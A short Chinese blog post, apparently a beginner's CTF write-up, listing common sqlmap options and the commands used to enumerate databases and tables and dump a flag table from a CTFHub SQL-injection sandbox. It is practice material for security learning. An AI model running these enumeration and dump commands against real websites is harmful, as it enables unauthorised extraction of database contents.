CTFHub-技能树-SQL注入

本文最后更新于：2024年5月14日晚上

sqlmap的一些常用方法：

参数	描述
`-u <URL>`	指定注入链接为 `<URL>`
`--dbs`	查看所有数据库数据
`--current-db`	查看当前使用的数据库
`-D <name>`	指定搜索的数据库为 `<name>`
`-T <name>`	指定搜索的表为 `<name>`
`--tables`	查看数据表信息
`--dump`	获取字段内容，即获取数据


`-r <filename>`	指定注入网站的 HTTP 请求为 `<filename>` 文本文件中的内容
`--columns`	获取列信息
`-C <name>`	指定搜索的列为 `<name>`
`--level <num>`	指定搜索等级为 `<num>`
`--cookie "<string>"`	指定访问网页时的 Cookie 为 `<string>`
`-p "<string>"`	指定测试的类型为 `<string>`
`--tamper "<filename>"`	附加名为 `<filename>` 的脚本

字符型注入

这里我尝试用一个新的工具——sqlmap，来解题

由CSDN，可知步骤如下：

① 查当前数据库：

1	`python sqlmap.py -u "http://challenge-f20ac55e6a171116.sandbox.ctfhub.com:10800/?id=1" --current-db`

其实前面还有一堆东西，但是我现在都还看不懂

② 查数据表：

1	`python sqlmap.py -u "http://challenge-f20ac55e6a171116.sandbox.ctfhub.com:10800/?id=1" -D sqli --tables`

③ 查具体数据，即flag

1	`python sqlmap.py -u "http://challenge-f20ac55e6a171116.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag --dump`

报错注入

法一

1
2
3

python sqlmap.py -u "http://challenge-f20ac55e6a171116.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag --dump
# 又报错了，发！！！
# 不知道为啥，反正sqlmap的使用总是有时候报错，难道是这个开启了一些其他的，导致不能用sqlmap了吗

法二

[ctfhub]SQL注入总结_牛客博客 (nowcoder.net)

CTF-Web

#CTF #web

CTFHub-技能树-SQL注入

http://viper2383.github.io/2024/05/14/CTFHub-技能树-SQL注入/

作者

w1per3

发布于

2024年5月14日

许可协议

CTFHub-技能树-文件上传上一篇

Web-CTF-sql一些题下一篇